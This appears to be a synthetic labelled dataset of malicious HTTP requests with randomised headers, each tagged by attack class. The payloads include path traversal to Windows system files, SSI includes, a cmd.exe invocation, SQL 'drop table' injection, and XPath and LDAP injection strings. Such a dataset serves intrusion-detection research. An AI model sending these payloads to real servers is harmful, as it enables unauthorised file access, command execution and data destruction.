GET /aEevaaQE-Ze.Amm./Qstr7Srtl.gif?itsdpab=9412&aoqiup=fhca7nejmisdl7whereatmpRi&8iceerstvimr3j=7593&Atlnb=2rls+pak3Ao&cwenu=Eadmin%26rOeebgsoundn&nrelodieoe=aW%40sc&tvhIhjexdo=53&lfiaHL=ron2rmonam&I-qIDN=%3C%21--++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&KetcbGdivhxinputLP=4&uo1woNeb=i%40v&sdeAogru=smnrleps&UtabZAE=az3d HTTP/1.1
Host: 244.105.63.176:83
Connection: keep-alive
Accept: audio/*;q=0.8, image/jpeg;q=0.1
Accept-Charset: iso-8859-15;q=0.7, windows-1258
Accept-Encoding: gzip, deflate
Accept-Language: eel-ef7mnw, mL-hdi;q=0.2, E-jc, brnatrt9-t3;q=0.0
Cache-Control: t6Mtgdzt='eooHtit'
Client-ip: 139.153.6.255
Cookie: xrzsneOktnshtws=414;mehsgarXwiEely=9i;pynombol=lNstbars4fmhrera;tqteqef7ewg2zn=eJnointoeEiiheoets;1hclrqr=e.iCg0iie
Date: Fri, 11 May 07 03:02:32 GMT
ETag: W/"nQowONbBuqGBRqoN"
Expect: 100-continue
If-Modified-Since: Thu, 15 Apr 04 04:48:22 UTC
If-Unmodified-Since: Sat, 20 Jan 07 10:16:09 GMT
If-Match: "99O..PUVgPiAO.3-gk4"
If-None-Match: *
If-Range: Tue, 20 Jun 06 07:25:08 UTC
Max-Forwards: 4
Pragma: ooa='sRn'
Proxy-Authorization: Digest realm
Authorization: NTLM dG91cm85YW9hZ2lldW9tbDZnZWl0NTk0aGZ2bWViOTVsdGVZNTY3enJydm4xZWVy
Range: -41940,-0
Referer: http://www.oe3l.net/e1hreme/aiesnDfd/xel9/tceh3Esd/oute.conf
TE: gzip,trailers,trailers
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 8.7; l5-eA; rv:4.2.1) Gecko/76463125
UA-CPU: x86
UA-Disp: 854,3532,8
UA-OS: Windows 98
UA-Pixels: 3212x5121
Via: ECLr/1.2 86.155.153.37, 41o0t/0.8 76.95.201.117, 5.8 186.250.32.42
Transfer-Encoding: identity
X-Forwarded-For: 236.213.169.46
X-Serial-Number: 017478485639
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40677
Start - Id: 37319
class: LdapInjection
GET /5CA8Gqz/t3JjKxKb2jjtFN7XmrBn/wytssE4retkeTm/liSprilooniN/uUp3hOAR8tCRJNJR9N.css?eiacbdny=ett&EeoeRNft=88&digsha8patnr=4t+&uof=ia3riotia5zNf8tyhm&itmraAsN=aodhedaozsyoEtt&mtgtnert=ccon3cnienfwu&eprtm=nEtm&wrRr=77&arnEdruqUiidai=yati&teer7haoI=sr7bdlte&2erR3ldenore=boWsthew5txtxdnjs&Io2cqyiT7A=yEyEe26uIg&eajAelumhete=datdhc+o-o%25odtd%2Bo&Oeeeoie=8sl+l+5u HTTP/1.1
Host: www.TelI5Ir.be
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: macintosh, isiri-3342, windows-1254;q=0.2, iso-8859-2;q=0.7
Accept-Encoding: 
Accept-Language: anneu)(&(objectClass =    Msh*)
Cache-Control: no-cache
Client-ip: 68.215.146.126
Cookie: bcd8tl=tuizGPU
Cookie2: $Version="95"
Date: Sat, 09 Feb 08 07:36:21 CET
ETag: "SqzTXG3cL_LrKvg7K"
Expect: 100-continue
From: rtec@se2cehaQn.com
If-Modified-Since: Mon, 08 Mar 04 08:01:04 GMT
If-Unmodified-Since: Wed, 30 Mar 05 10:25:29 UTC
If-Match: *
If-None-Match: "r4@o@yIuyqTyNzVgc@sS"
If-Range: Fri, 26 Feb 10 13:48:16 CET
Max-Forwards: 8
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM aWgzbmF0aXNlZnNlcjlodG1hdGxtU3IycnRsZWFPTjdibms=
Authorization: NTLM dHJvdHR6c2FFcGk5YXQ3c3dzY25pWWR5eHk3ZTh0bnNhZXFpYWx4bm8=
Range: 1-568088,6956-8,075-
Referer: http://8artfCnf.st/fgu6wm0A/pEei/aeqr9/iBye.txt
TE: trailers,deflate,chunked
Trailer: Host
User-Agent: hncsmp
UA-CPU: StrongARM
UA-Disp: 050,5091,32
UA-Color: color16
Via: 8.3 100.197.150.40, 6.7 www.8hAe.tiff, HTTP/2.7 www.nauUrl.shtml
Transfer-Encoding: gzip
Upgrade: wnnr/5.6, rfetYt/6.7
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 220.106.136.48
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37319
Start - Id: 45125
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: www.aeuwgaeWps.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress, deflate, compress, deflate;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 223.196.253.50
Cookie: htrm7rNhnib=lslek;trM=uooDI~wp-ydfdn;sne=311842;homeuUiqV.NZk=91616317;wOmoPvl=691609;retst=t-Wt9tnmX
Cookie2: $Version="70"
Date: Sun, 22 Oct 06 01:31:07 CET
ETag: W/"d3mNFnIN_1gDH9-Xe0"
Expect: 100-continue
From: lmfapce@abHed.be
If-Modified-Since: Fri, 24 Aug 07 20:57:26 GMT
If-Unmodified-Since: Fri, 29 May 09 04:10:34 CET
If-Match: *
If-None-Match: "UmH3kYZ5rR1lfwb4.D"
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 2
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic aGhjaE9TOnNpYWRvdWk=
Range: -3,456-488022
Referer: /szeeurDn.wav
TE: gzip,chunked;q=0.0
Trailer: Host
User-Agent: apguo (a9EY4qj1; aBnNI7dht; ldiK0v3; ek5k@sz; w8C-WUj0)
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0464x327
Via: 5.5 120.26.172.133
Transfer-Encoding: compress
Upgrade: srsd/2.9, nNisSb/2.9, eTj/8.9
Warning: 694 75.28.35.212 "sieenweirr1p" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45125
Start - Id: 40581
class: SSI
GET /okSnCclldqd/j@9XyMn0RQN@W-nlxY3N/r6EkhX31nUEOiF0E-SSB/HperlX9cl/4Si_KFXPt5x30/sYxnmqClPg@RRm/jiZJOYdufq@NeyU/d7GbfATyTkOEf/S1bw/t4ixYo6UQVL/7idHinstyleG/mQSI.mspx?rpq=%3C%21--+%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&tlstDtrrccrpf7=eeci&smtHzynqu=shHeb2nxg&rHcee=mxi1mt&oWNez=deleteLa5httpsr&4r8os=yeoflueGcacnnbdgbo&rxnMaoenedwtsd=9ylAsmzuhjuhdx&dhafztOslioiQ=0t+aa%24eo&yYqB=n2aclwc&blc6esitwte=3RsUcytoisromrrn&mn=e8adahh&xnedlfxePy9iieO=bgsoundOse&tcss=o3X_t HTTP/1.1
Host: www.7eonfg.com:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-2;q=0.5, ks_c_5601-1987
Accept-Encoding: deflate, compress;q=0.0, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 58.12.242.231
Cookie: iidGotelhon1ah=i ]d;ausbbej=7745;vpoi1=nohsrNoy5a;lisfttftgeai=daticohr2ouenjv;rsqbo3essvDmeAn=8;ncosit6tir6S=7hjj3JhW.
Cookie2: $Version="5"
Date: Wed, 13 Feb 08 19:08:53 CET
ETag: W/"zTQC3.87LXl7-H06oh"
Expect: dunnoepn=f5es
From: ws8c3i@tat8.st
If-Modified-Since: Mon, 20 Dec 04 11:15:20 CET
If-Unmodified-Since: Fri, 09 May 08 16:31:42 UTC
If-Match: "ReQBDLuspdtzA_9MM@"
If-None-Match: *
If-Range: *
Max-Forwards: 4583
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM eXNIb3R0ZWE5enRuYWlucm5JNWFldGxFYTNxYXJtNm9ubm90
Authorization: oohiae ethn2=e7oeT4j
Range: 437-
Referer: /eN3Rldnq/pfm7/akm3.tar.gz
TE: deflate;q=0.8
Trailer: If-None-Match
User-Agent: Hlmextph (sUngBu5@f@; n8-sZJLi; iF-T0G; nGLrsU8; o2qyYn)
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: Windows 98
UA-Pixels: 8517x087
Via: HTTP/1.6 118.151.109.145, 6.7 www.d0ta.png:0736, FTP/1.4 www.uzou.png
Transfer-Encoding: deflate
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 835 www.trhpd.htm "psE9Ldemvcians32" "Sun, 26 Nov 06 20:41:29 UTC"
X-Forwarded-For: 169.156.207.121
X-Serial-Number: 69115
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 40581
Start - Id: 35344
class: SqlInjection
GET /xKQukHVj64PDgPGCWo0C/rre8eneav/8F.NviZ-ROQGcISxaV/ls8YshutdownDchild/aeeuon5u/triqnloedi1hT/nscTahv/eemrDutlkHdiisznier.html?let=%2Ftacceptr0TU5kir%25nTto&nBefemawet=%27%3B++++drop++table+++++admin&elzi=y_XEPG.hFNMv HTTP/1.1
Host: 21.246.6.69
Connection: keep-alive
Accept: text/*, application/*;q=0.6, text/*
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: *;q=0.6
Cache-Control: rnoGh=dxb
Client-ip: 239.166.109.138
Cookie: nrutcnnUr=2;YJUn0ROQxmlA_O=t  
Cookie2: $Version="2"
Date: Sat, 21 Jun 08 12:24:13 CET
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Tue, 06 Jan 09 15:43:18 GMT
If-Unmodified-Since: Tue, 16 Jun 09 05:52:36 UTC
If-Match: "lE3k8cXeKHc7Msp."
If-None-Match: "CsjpdOm.FkF-1bY"
If-Range: "YQpP6vnPRrX77IlX"
Max-Forwards: 4
MIME-Version: 1.4
Pragma: s='g7oc0'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: emdr 68oa=f1Osdlet
Range: 16442-228208
Referer: http://www.twfewfs.com/Yaeoew/o4jsrk4/oztmmgNb/nnONoc.txt
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (compatible; MSIE 8.2; Open BSD i586; aoeiwel)
UA-CPU: 68000
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: FTP/3.8 www.sDUaIz.shtml, 3.3 www.unns.jpg, 2.0 120.121.77.67
Transfer-Encoding: mders; TbNmenna=aset
Upgrade: ohz/1.8
Warning: 597 www.ssytddta.jpg "8Lti" "Wed, 10 Mar 04 17:59:42 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 49332836434865921250
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35344
Start - Id: 49558
class: XPathInjection
GET /hLas6c3frtgmewe/bpoeptho/al-oMu2-uA3vN/mbee.php3?laaqrgioi9rj=argo&R3servicesc8dXSreplaceconnectl=Htnylnmeddtsnzl5o&bnumwosao=irNoedEepepiln&esThXNRy=tzoykzb%25uilaeendfteai&nhantD4rch6Euow=-gs&dcaatednnaf=altDE6V&ecenhsR88a1o=pYta&imgWREi=0heuwo&0geh=+&tu=eao1Tnsxhbnge&dpoedrdl=datlchild8qfrom+hetcopthtqhl+t&DetcyLmocha9D=og0sgwe%27%5D+++%7C+++P++++%7C++++%2F%2Fuser%5B++++name%2Ftext%28+++%29++++%3D++%27jidep&mvt7n86aiadadum=171&7Y_xmlbBIm=356 HTTP/1.0
Host: 178.197.185.21
Connection: oeln
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.2, deflate, gzip;q=0.7
Accept-Language: onnIDc-reaait, AEtith8-oG;q=0.5
Cache-Control: no-cache
Client-ip: 69.118.218.13
Cookie: 3eadcrsn7A=hA6vFNwyaIw;ise=1f
Cookie2: $Version="1"
Date: Sat, 26 Jul 08 15:10:28 GMT
ETag: "XzC6Z-Vy8j2n97GIJ"
Expect: 100-continue
From: petnihea@07eei4h.cz
If-Modified-Since: Sat, 26 Jun 04 24:57:33 UTC
If-Unmodified-Since: Wed, 12 Jul 06 08:52:06 CET
If-Match: "gSfVBjMCwIxcO2KBCV"
If-None-Match: "kEWDeLnT.B7v3YOoK"
If-Range: "Jzovszu6u9MAiD@_x2"
Max-Forwards: 756
MIME-Version: 0.7
Pragma: lste4pi=l
Proxy-Authorization: 9a2ilt dswfus7=iredewem
Authorization: Digest nonce
Range: 5151-28,-30112,9663-34
Referer: /ir69oy2r/hlpn.msf
TE: trailers,gzip;q=0.4,deflate;q=0.6
Trailer: If-Modified-Since
User-Agent: 0ayc9/1.9.2
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: 8.0 www.fdlOhZh.jpg
Transfer-Encoding: compress
Upgrade: 0ba/9.3, efdwri/1.0, tlso/8.2, tVzp/3.0
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5637590848505362302
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49558
Start - Id: 44313
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.k82cewtnt.com
Connection: keotnz
Accept: image/jpeg;q=0.1, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: identity, identity, deflate;q=0.3, identity
Accept-Language: *;q=0.0
Cache-Control: min-fresh=4
Client-ip: 18.62.79.179
Cookie: 4o@scripthtpassgt=mtmewl%rsdocumentd;nbUn=aestbd)vnodeti~o;htqaieieVhdbaaN=+e;es=S6Leh2Sairsaanddndh;lbgftr=hxOee;iib=~otsy 
Cookie2: $Version="30"
Date: Tue, 02 Feb 10 06:27:29 CET
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: T8dcgstj@o3Utp.fr
If-Modified-Since: Sun, 17 Jun 07 17:22:25 GMT
If-Unmodified-Since: Thu, 29 Sep 05 06:22:19 GMT
If-Match: "CCiEzafJ6.IYM8u"
If-None-Match: "lwb5.bJassLthE5BqRF"
If-Range: *
Max-Forwards: 752
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic ZXI4YWY6ZUVubm44
Range: -2
Referer: http://azse91.com/nsjl.sh
TE: chunked;q=0.0,deflate
Trailer: If-None-Match
User-Agent: ia_MzW3q http://www.ceAmev.it
UA-CPU: MIPS
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: apeOl/9.9 www.edtlncmS.js
Transfer-Encoding: deflate
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44313
Start - Id: 41319
class: SqlInjection
GET /dxIM/y2L_yNPnj8jXtxE/6YZRLtznodeVform/nFT/tntm/i4V3u.Y/xoanPeseoxsMerbdni/fnHeaIcc/Gwp-passthruXuSSBFI.aspx?wTeotos0=mra9QyljdioemT&ir=%27+ef&-XXsc1from5N=9l9H-Sw&oromaE=fLhbggJNx&aruusNeutsss=lobelsr5o&tezyemceoCsi=rph3AO HTTP/1.1
Host: www.rshi1.cz
Connection: 4einlihs
Accept: audio/*;q=0.1, image/png;q=0.1
Accept-Charset: iso-8859-8-i, big5;q=0.0, hz-gb-2312
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 177.178.50.140
Cookie: hy6oadili='roi;siggel7d=OR    'ano5vubu'  LIKE  'Sim%';noaorfftae=samolumegdskor;CresRsVnlts=boot.ini;a4ebdImmdiut8A=rhrgfeiuI
Cookie2: $Version="7"
Date: Thu, 19 Apr 07 07:25:33 UTC
ETag: "smpG3lg5lJpc@_G"
Expect: 100-continue
From: jtwc@er22t6e.st
If-Modified-Since: Wed, 13 Jan 10 17:05:08 CET
If-Unmodified-Since: Mon, 30 Jun 08 24:27:36 GMT
If-Match: "3pq.Y1ltzEY.Yrj-Fw"
If-None-Match: *
If-Range: "kRsDH9J48B66QuEX.CJ9"
Max-Forwards: 6685
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic bm9lSDpDZWN1
Authorization: NTLM aHVvbWV5VDFudGVpZE51Y2ZudGxvbm9oZWEycGxhaWVlb3VmdGJhdWhl
Range: 227201-2410,49431-80,697388-
Referer: http://emaw3dqc.org/shEgnasS.cfm
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: eth5nmlxaEts
UA-CPU: PowerPC
UA-Disp: 111,881,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9326x2155
Via: 5.7 www.rtntsnyn.html
Transfer-Encoding: Alrmd; xizmqt=oentb
Upgrade: Ylhk/4.7
Warning: 004 154.30.120.154 "ioha3u6nss309t" "Mon, 11 Feb 08 11:38:00 CET"
X-Forwarded-For: 93.157.11.88
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41319
Start - Id: 44800
class: PathTransversal
GET /tscPNIo5Ma5/lbofaaetRomu6beigil/2ireErnt/7na7eqtmuehe/h08qhut2UT-BxFewNP/uIVQ/w5A2xlkFZCjg6/psgUCvphucO/46/el6wrupSas5hN.dll?sru5=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&8g7EoDtv1=08 HTTP/1.0
Host: 47.194.120.159
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-kr;q=0.0
Accept-Encoding: identity;q=0.7
Accept-Language: fes-tf, n9dhrhc-f, t8ytHFoE-tthxweh
Cache-Control: max-stale=99726
Client-ip: 251.54.255.245
Cookie: xSaanohherrct=2;9noctztmaL=e6-o;HoD8andtB=3;th=rnc;sMiP6BDsSL=eMt
Cookie2: $Version="73"
Date: Tue, 05 Jan 10 16:49:06 CET
ETag: W/"djyw31vse5DU8jEaNO_"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Tue, 19 Jul 05 15:44:20 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Sep 09 11:40:45 GMT
Max-Forwards: 5870
MIME-Version: 7.4
Pragma: 7erira=rnd
Proxy-Authorization: Digest qop=auth
Authorization: Basic c2FpYTptdGExUmxv
Range: -64744,0-
Referer: http://www.ifaoirao.de/hRDnreu.gz
TE: trailers,deflate,gzip
Trailer: Pragma
User-Agent: esTiwNesdiomuopArHro
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 4.5 182.36.213.142, FTP/1.0 57.54.96.233, HTTP/6.4 220.191.149.19
Transfer-Encoding: ncqru; klDi=mthma
Upgrade: nraObn/3.7
Warning: 306 www.lawl.shtml "aurdPlier1ephtrtem2m" "Sun, 15 Feb 04 16:47:27 UTC"
X-Forwarded-For: 122.93.208.190
X-Serial-Number: 42053074878
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44800
Start - Id: 45740
class: PathTransversal
GET /kXN_uAHuB/GvvbscriptMhlibYrcopyYm3-TI/5D/wL3k.0uM5dUNKzY/aIEIErySnoh9/J7Q/aomdoI/NlogoIpX/nShjI@uX2Nqh_JFimJ.jpeg?ucin859=7&obws9uE=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&s04n1hodekqdqe=twqgeut HTTP/1.1
Host: 71.250.78.111
Connection: ctOmeB
Accept: application/postscript;q=0.9, application/*
Accept-Charset: x-mac-icelandic;q=0.9, iso-8859-2, iso-10646-ucs-2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 172.160.2.55
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Sun, 12 Apr 09 15:13:37 CET
ETag: W/"MmZYP5uH2Z8Y7FOUG_"
Expect: a3ieu
From: eyebc4et@nriRuu.de
If-Modified-Since: Sat, 03 Sep 05 09:02:23 CET
If-Unmodified-Since: Wed, 13 Jan 10 04:52:02 UTC
If-Match: "bLbXfUfEmhZKj7Kq3"
If-None-Match: "GbAVIE@s-Vfjv0j"
If-Range: Sun, 12 Aug 07 16:44:49 UTC
Max-Forwards: 2
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Digest opaque="feamso"
Range: -500252,934-3694
Referer: /d1ojsa/2sdeoe0.jpg
TE: trailers,trailers,deflate;q=0.8
Trailer: Via
User-Agent: caBts5g
UA-CPU: Sparc
UA-Disp: 797,3668,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: HTTP/7.3 152.107.181.213, 1.6 www.ooynE4sM.gif, 3.6 154.120.161.205:5
Transfer-Encoding: Iyys; d6endwv=tx0d
Upgrade: tnr5/7.1, Ete3at/1.1, Wociex/0.4
Warning: 198 5.109.101.104 "kAoaslle" 
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 3591562194850483
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45740
Start - Id: 49399
class: XPathInjection
GET /SulyRenaF/d6ettaDdRuybdtilr/cdtfhsmgjrdeuenTu0ii/att/R.UiuobjectAi8/ao/dTfxxjX@j400Z8/ubiletnS2E6tstJEex.css?inaocke4=44&_UOD90t=tEGSg&5sxeiu=sutcE%27+or++++1%3C+oet%2Fna%2Fikt9%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D80%5D+or+%27pS8o%27+++%3D+%27&beceatetn7w9m=mHqZBqu&3idaseetst=ttYt6%2Fe%25o0uIl+bee7F&ut=n%26llEn%25u&etcrost=openzsqN&tcEsoh=llna&sedete5ipheod=a3iKTY1rm&oaisnen=sy+pie HTTP/1.0
Host: 207.149.102.203
Connection: teciens
Accept: image/*;q=0.8, audio/x-wav, video/*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: identity, compress, deflate;q=0.7, gzip
Accept-Language: 6DL1bom-4S3lv
Cache-Control: crthOodt='lv6amfe'
Client-ip: 172.166.16.169
Cookie: raee=dropmc;qicTiq=2e
Cookie2: $Version="461"
Date: Tue, 01 Sep 09 11:41:36 CET
ETag: "pzzWYLc9y.a5zyTx8D"
Expect: 100-continue
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sun, 08 Jul 07 22:24:35 GMT
If-Unmodified-Since: Sun, 26 Sep 04 09:23:32 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jul 04 20:23:54 CET
Max-Forwards: 4455
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM OXV0b2Zqb3NpZXN6ZmkwaUJ0dHVpc25jZG9hb3NmcHQ4dHJybnJzM05wMg==
Authorization: eva0ie ht0wn=itiroFtg
Range: 67912-847396,-254666,29-
Referer: http://www.ru2it.org/iehe/7hthaEo/byLsead/oYrstncT/nhon4hra.zip
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/8.2 (compatible; ttlte; SunOS sun4u; oaoe; iE9tG; reicn)
UA-CPU: StrongARM
UA-Disp: 427,646,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 604x3659
Via: 0.4 www.uejfxj6.png, 4.2 www.aptodf.gif, 8.4 www.tozmn.css
Transfer-Encoding: gzip
Upgrade: goiteB/8.3
Warning: 260 86.25.83.250:0820 "hreojjeu" 
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 37054990
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49399
Start - Id: 48593
class: XPathInjection
POST /hdy51asind5aoqdsaag/d8oS4pw8TLc/jtq7e/0Tf/pP/uba.jpg? HTTP/1.1
Content-Length: 396
Content-Language: qa1wroc
Content-Encoding: compress
Content-Location: /groqi/paIcoi20/r4co3Na8/o7sss.ace
Content-MD5: QWVQZW10ZmN3ZW8yYWxmcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Sep 08 18:22:20 GMT
Last-Modified: Thu, 29 May 08 07:37:19 GMT
Host: www.nLtTe.be:778
Connection: ltzeiA
Accept: video/quicktime, image/png;q=0.7
Accept-Charset: iso-8859-8;q=0.6, cp-950;q=0.3, iso-8859-7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=5122
Client-ip: 58.151.109.14
Cookie: noixRe4yyrs=00266712;tha9Utfed2m=3867;P0nwinntgQHUtDAv=atcyTioeahn 3d;ieo;Bnf9ehw=150;orav=samwb:mouus;acona=w
Cookie2: $Version="357"
Date: Wed, 28 Dec 05 05:10:25 GMT
ETag: "24798vzil9D39PB9"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Fri, 12 Aug 05 14:17:39 UTC
If-Unmodified-Since: Fri, 19 Oct 07 09:57:59 GMT
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Wed, 10 Dec 08 08:26:17 UTC
Max-Forwards: 41
MIME-Version: 0.0
Pragma: Mc6ni24t=elsqie9
Proxy-Authorization: Basic eG9IaTZ0ZGc6ZWZOcmg=
Authorization: Basic bGUxdDpudXpTZnE=
Range: 39-76,5-4266
Referer: http://www.ranms.com/liRtg/ifcsEt/EoMhmc/1ieinds/86ctt.msf
TE: deflate;q=0.7,gzip
Trailer: Authorization
User-Agent: rLTWaVnqu http://www.givts.be
UA-CPU: PowerPC
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 853x5228
Via: g37m/1.0 186.25.199.111, 8.6 www.4djtnxh.jpeg:9411, 4.8 www.i0orsjd.htm:2567
Transfer-Encoding: gzip
Upgrade: iet/6.7, kor/5.0, pfedee/5.3, sae1/5.6
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 41138293275827237103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

l4rx@nk=a((St&g58hg=a &athe=w tDiasarT&llqn6bn=isaemandegtoecvo&eenyEootdeopVa=ebgsoundeu&bry=6e2&a8h=nuY986sv1rl-&ns4sheoroiT=it7fgoSAio4ejet9e&l8uo0os6alwEhfT=5nleinclude&icsrS=4mmrEiahb&eyi34aX5ls4p=mmn&Ttbylityi=(i  <  count(eat/child::text())     and  j     <  count(4ulft8/child::comment())    and    k <     count(ao/child::*)   )&pirN=r

End - Id: 48593
Start - Id: 39192
class: SSI
PUT /qZ0LZD/iG2m2SNaBJ.4/odie5tk93/nucOeenuMhwihv2aaj/e7P9odadtA1cgdd6a/nhG_J7a.yuRm_.C@QPM/lTE/OlU9EGdVOidnull01/moyanbRrnxhUz8s/tgGr5aB62kAktrZ/ee9KvMSQ5.@gJKNMSL.png? HTTP/1.0
Content-Length: 80
Content-Language: lnu5UEtt,rPm,jidiO
Content-Encoding: gzip
Content-Location: /eyAoi/oancdtk/0Nietf/eetlmA/atanrxt.zip
Content-MD5: d3B3d3RwbmhudWllYWZrYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jun 06 10:05:37 GMT
Last-Modified: Tue, 02 Mar 10 12:47:18 CET
Host: www.ohdo.be:17980
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: idUo='oae'
Client-ip: 165.60.213.241
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="712"
Date: Wed, 25 Nov 09 16:06:39 CET
ETag: W/"4o6Nz.t2GynO1u6u"
Expect: 100-continue
From: nGxh@nraae5E.gov
If-Modified-Since: Tue, 20 Jun 06 06:15:09 CET
If-Unmodified-Since: Sun, 23 Apr 06 24:34:38 UTC
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: *
If-Range: *
Max-Forwards: 8283
MIME-Version: 8.1
Pragma: 1woam=eza
Proxy-Authorization: Digest realm
Authorization: NTLM MlV6Zm9ucG1PZUdNaXRwc2xycUFmRWVzQXNBbnQwQngyeWFJ
Range: 53710-,-18914,6-
Referer: http://www.peNea.org/dnithoo5.zip
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.4 (compatible; 7op8; Solaris; tfgoct)
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: FTP/4.0 102.30.170.153:3838, 3.4 www.OQnl.shtml
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
